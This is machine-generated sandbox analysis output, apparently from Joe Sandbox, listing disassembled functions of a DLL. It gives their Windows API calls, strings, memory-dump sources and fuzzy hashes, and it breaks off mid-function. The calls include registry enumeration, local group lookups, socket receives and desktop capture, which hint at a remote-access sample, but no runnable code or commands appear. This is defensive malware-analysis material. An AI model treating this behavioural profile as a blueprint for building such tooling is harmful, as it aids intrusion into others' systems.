                                                          Function 10017480 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 24libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(dwmapi.dll,10098B10,1001767F), ref: 10017486
                                                          • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 1001749F
                                                          • GetProcAddress.KERNEL32(00000000,DwmEnableComposition), ref: 100174AB
                                                            • Part of subcall function 10017460: #102.DWMAPI(00000000,100174B6), ref: 1001746B
                                                          • FreeLibrary.KERNEL32(00000000), ref: 100174B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryProc$#102FreeLoad
                                                          • String ID: DwmEnableComposition$DwmIsCompositionEnabled$dwmapi.dll
                                                          • API String ID: 921056788-1849796216
                                                          • Opcode ID: e7bc18532d82db7781f6db1b43c4f4c4d0ba297617c9142dcf3622deb4fcc179
                                                          • Instruction ID: ec8973c85b4295611fe6e660086daf7ad590bfada4181087f49f392a1ed51eb0
                                                          • Opcode Fuzzy Hash: e7bc18532d82db7781f6db1b43c4f4c4d0ba297617c9142dcf3622deb4fcc179
                                                          • Instruction Fuzzy Hash: 29E0123A502D3A679251F72D5C14DCF2AA8FF867E13464251FD08F6114DB24DD4289B6
                                                          Function 10004CF0 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _CxxThrowException.MSVCRT(?,100F59A0), ref: 10004DC3
                                                          • #823.MFC42(10004C7C,?,00000004,00000000,00000004,10004C8B,00000004,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10004E37
                                                          • #823.MFC42(00000000,?,?,?,00000000,10097CF0,000000FF,75CA23A0,10004C8B,?,00000000), ref: 10004E48
                                                          • #825.MFC42(00000000,00000000,?,?,?), ref: 10004EAE
                                                          • #825.MFC42(00000000,00000000,00000000,?,?,?), ref: 10004EB4
                                                          • _CxxThrowException.MSVCRT(?), ref: 10004ED1
                                                          • #825.MFC42(?,?,?,?,?,00000000,10097CF0,000000FF,75CA23A0,10004C8B,?,00000000), ref: 10004EDE
                                                          • #825.MFC42(10097CF0,?,?,?,?,00000000,10097CF0,000000FF,75CA23A0,10004C8B,?,00000000), ref: 10004EEE
                                                            • Part of subcall function 10004FA0: _ftol.MSVCRT ref: 10004FDF
                                                            • Part of subcall function 10004FA0: #823.MFC42(00000000), ref: 10004FE9
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #825$#823$ExceptionThrow$_ftol
                                                          • String ID:
                                                          • API String ID: 3722084872-0
                                                          • Opcode ID: c76f4588f4861e8b0e5033ec5df18216b91fc0f614261ac88326526c7a5f0dfa
                                                          • Instruction ID: a565fb7e3d51c96f679dbc9a240e4393d41c51425d2560a9ab3a27c4c36f4040
                                                          • Opcode Fuzzy Hash: c76f4588f4861e8b0e5033ec5df18216b91fc0f614261ac88326526c7a5f0dfa
                                                          • Instruction Fuzzy Hash: 9F51B4B5A002099BEF00DF64C881FEEB7B9EF48680F014029F905AB345DF34B9058B95
                                                          Function 10018DF0 Relevance: 12.2, APIs: 8, Instructions: 169sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 100193B0: ReleaseDC.USER32(?,?), ref: 100193CA
                                                            • Part of subcall function 100193B0: GetDesktopWindow.USER32 ref: 100193D0
                                                            • Part of subcall function 100193B0: GetDC.USER32(00000000), ref: 100193DD
                                                          • GetCursorPos.USER32(?), ref: 10018E2A
                                                          • GetCursorInfo.USER32(?), ref: 10018E4B
                                                          • DestroyCursor.USER32(?), ref: 10018E74
                                                          • GetTickCount.KERNEL32 ref: 10018F68
                                                          • Sleep.KERNEL32(00000001), ref: 10018F7D
                                                          • GetTickCount.KERNEL32 ref: 10018F7F
                                                          • GetTickCount.KERNEL32 ref: 10018F8C
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 10018F90
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountCursorTick$DesktopDestroyExchangeInfoInterlockedReleaseSleepWindow
                                                          • String ID:
                                                          • API String ID: 3294368536-0
                                                          • Opcode ID: 037408136d0e8afe5519c2a5e62d739685f91187dea39c72eced2e216c808e74
                                                          • Instruction ID: 4f03d926a0baacb7089b61cc6bb794afa349875f5de70ab595e6e7c43cb61433
                                                          • Opcode Fuzzy Hash: 037408136d0e8afe5519c2a5e62d739685f91187dea39c72eced2e216c808e74
                                                          • Instruction Fuzzy Hash: CB5181752007049FD724DF28C884A6AB3E6FFC8350B544A2DF586CB651D730FA86CB61
                                                          Function 10015040 Relevance: 12.2, APIs: 8, Instructions: 159registrymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 10015071
                                                          • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000,?,00000000,000F003F,?), ref: 100150A7
                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,00000000,000F003F,?), ref: 100150E6
                                                          • #823.MFC42(?,?,?,?,00000000,000F003F,?), ref: 10015123
                                                          • RegEnumKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 10015178
                                                          • #825.MFC42(00000000), ref: 100151BD
                                                          • RegCloseKey.ADVAPI32(?), ref: 100151CA
                                                          • LocalReAlloc.KERNEL32(?,?,00000042), ref: 100151D8
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocLocal$#823#825CloseEnumInfoOpenQuery
                                                          • String ID:
                                                          • API String ID: 601778281-0
                                                          • Opcode ID: a2b48a681b185d323437fdecebe6a6adc8219f97ee03d012f06754e556716deb
                                                          • Instruction ID: 88fa596de87147defa139ed4991a26d14cbba2f64f8a82903b7c0e8481319102
                                                          • Opcode Fuzzy Hash: a2b48a681b185d323437fdecebe6a6adc8219f97ee03d012f06754e556716deb
                                                          • Instruction Fuzzy Hash: 9F517171604305AFD714DF28CC91B6BB7E9FB88610F584A2DF949DB380D635ED058BA2
                                                          Function 1000A3B0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A40F
                                                          • ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A417
                                                          • memmove.MSVCRT(3B4208C4,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A439
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000A44B
                                                          • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000A458
                                                          • ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?,?,00000000,00000065), ref: 1000A460
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?,?,?), ref: 1000A497
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(3B4208C4,00000001,?,?,?,00000000,?,-00000008,10097F61,000000FF,10009756,-00000008,?,?,?), ref: 1000A4D8
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@memmove
                                                          • String ID:
                                                          • API String ID: 1074130261-0
                                                          • Opcode ID: 9c78330a7592489e721474567922780b083d31e010480504787a7ba47f8834b6
                                                          • Instruction ID: 8f937d4beb23756cef0cc620a4d7fe7e7cbc97e07a2ad92db45a8aecb1b163fa
                                                          • Opcode Fuzzy Hash: 9c78330a7592489e721474567922780b083d31e010480504787a7ba47f8834b6
                                                          • Instruction Fuzzy Hash: B141D1396407549FD710CF19C8C869ABBE5FBC9BA0F44862EEC5A87351C7759D40CB40
                                                          Function 10022D10 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strnicmp
                                                          • String ID: CONNECT $GET $HEAD $POST
                                                          • API String ID: 2635805826-4031508290
                                                          • Opcode ID: 8e8e20cc63fc578047ea9d7e9a2d678a8d19106c685452c0aaff9deb6189becf
                                                          • Instruction ID: 56b8aeecee1c06f363fda1625e6891ae750e34b4eb493f0379659d4a6d732177
                                                          • Opcode Fuzzy Hash: 8e8e20cc63fc578047ea9d7e9a2d678a8d19106c685452c0aaff9deb6189becf
                                                          • Instruction Fuzzy Hash: 9F01B131300651ABE700EA6CFC00BCE73D8EFC5316F860476F940DB280E3B888058B91
                                                          Function 10003870 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: sprintf$floor
                                                          • String ID: %.0f
                                                          • API String ID: 389794084-4293663076
                                                          • Opcode ID: cb3f7aaaf6b266179aa8dd0ee4d912ea5967b7a82becc2bba026ec5a4ef99637
                                                          • Instruction ID: a274ceac6ce3522e1593489d29bd3f77ae1b15863641420014f16e45a4b04ce6
                                                          • Opcode Fuzzy Hash: cb3f7aaaf6b266179aa8dd0ee4d912ea5967b7a82becc2bba026ec5a4ef99637
                                                          • Instruction Fuzzy Hash: F0417CB1A04615A7F3028B54ED9879777ACFFC23D6F044261FE8892294DB21D974C7E2
                                                          Function 100252E0 Relevance: 10.6, APIs: 7, Instructions: 115stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mbstowcs.MSVCRT ref: 1002533C
                                                          • NetUserGetLocalGroups.NETAPI32(00000000,?,00000000,00000001,?,000000FF,?,?,000000FF,771B0440,1012C810), ref: 10025362
                                                          • wcslen.MSVCRT ref: 100253A2
                                                          • malloc.MSVCRT ref: 100253AA
                                                          • wsprintfA.USER32 ref: 100253BC
                                                          • strncpy.MSVCRT ref: 100253CD
                                                          • free.MSVCRT ref: 100253D4
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GroupsLocalUserfreemallocmbstowcsstrncpywcslenwsprintf
                                                          • String ID:
                                                          • API String ID: 4292357205-0
                                                          • Opcode ID: 023305b100a19051cf8433f0c5e1e5ebd5d1c0fcd5ea7517d1341ce18eb5f5f0
                                                          • Instruction ID: a7a275717bc2eaa59cca954d1c38aa140f42989ba72a02d1dc1ea02adfe13beb
                                                          • Opcode Fuzzy Hash: 023305b100a19051cf8433f0c5e1e5ebd5d1c0fcd5ea7517d1341ce18eb5f5f0
                                                          • Instruction Fuzzy Hash: 513145701083626FD315DF24DC809EBBBE8FB88315F400A2CF99AC3281DB71DA458B96
                                                          Function 1002CA20 Relevance: 10.6, APIs: 7, Instructions: 108networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 1002CAA5
                                                          • __WSAFDIsSet.WS2_32(?,00000001), ref: 1002CAB9
                                                          • recv.WS2_32(?,?,00002000,00000000), ref: 1002CAD2
                                                          • __WSAFDIsSet.WS2_32(?,00000001), ref: 1002CAFA
                                                          • recv.WS2_32(?,?,00002000,00000000), ref: 1002CB13
                                                          • closesocket.WS2_32 ref: 1002CB49
                                                          • closesocket.WS2_32(?), ref: 1002CB4C
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: closesocketrecv$select
                                                          • String ID:
                                                          • API String ID: 2008065562-0
                                                          • Opcode ID: e271df9bc814dd9e55aae6123291c06ec4163cbd0491a0e87936393d54a90af3
                                                          • Instruction ID: ec9980a7f672bdef49e95ff414efc98edb547c3db94ee23b0d429c32d668f30b
                                                          • Opcode Fuzzy Hash: e271df9bc814dd9e55aae6123291c06ec4163cbd0491a0e87936393d54a90af3
                                                          • Instruction Fuzzy Hash: 4A31E63560834D6BE335CEA4DC86FEBB7DCEB40780F810829EA45D6182D774E90487A3
                                                          Function 10016640 Relevance: 10.6, APIs: 7, Instructions: 106synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 1001666A
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,10098A71,000000FF), ref: 10016675
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,10098A71,000000FF), ref: 10016682
                                                          • #823.MFC42(000001F0), ref: 100166B0
                                                          • #823.MFC42(000001F0), ref: 100166E1
                                                            • Part of subcall function 10017D20: LoadCursorA.USER32(00000000,00000000), ref: 10017DFF
                                                          • #823.MFC42(000001F0), ref: 10016708
                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 1001676D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823$ExchangeInterlocked$CloseCursorHandleLoadObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 3589420723-0
                                                          • Opcode ID: 0fe1d094d2ae649a4336e8b454c16dc9f549e546ef118597d430beb08463b978
                                                          • Instruction ID: 712e268baaa8dd016a258d9f4d26cd7f4b70a444460d0a0c6ff612943e0d7f80
                                                          • Opcode Fuzzy Hash: 0fe1d094d2ae649a4336e8b454c16dc9f549e546ef118597d430beb08463b978
                                                          • Instruction Fuzzy Hash: C331B274644704ABE720CB348C92FAA77E5FB4C714F000A2DF69A9A2C1DB75F580C752
                                                          Function 1002A000 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105sleeplibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQuerySystemInformation), ref: 1002A022
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002A029
                                                          • _ftol.MSVCRT ref: 1002A12D
                                                          • Sleep.KERNEL32(000003E8), ref: 1002A15E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProcSleep_ftol
                                                          • String ID: NtQuerySystemInformation$ntdll
                                                          • API String ID: 720640769-3593917365
                                                          • Opcode ID: 81c20d366371711dfdb1a7521036f42f737606428b3e54b4f78aab55d15eddcf
                                                          • Instruction ID: 41f00a39049c1ab635cf875337fd2ec3a659e732abbf042300a1853cf40f708c
                                                          • Opcode Fuzzy Hash: 81c20d366371711dfdb1a7521036f42f737606428b3e54b4f78aab55d15eddcf
                                                          • Instruction Fuzzy Hash: 364173B5A083059FE310DF65DC85A8BB7E8FBC8750F418E2DF589A2250EF3199548B92
                                                          Function 10009430 Relevance: 10.6, APIs: 7, Instructions: 101stringfilememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 1000947B
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,00000000,?,?,00000000,00000065,000000FF), ref: 10009494
                                                          • GetFileSize.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,00000065,000000FF,10008780,00000001,00000001), ref: 100094B7
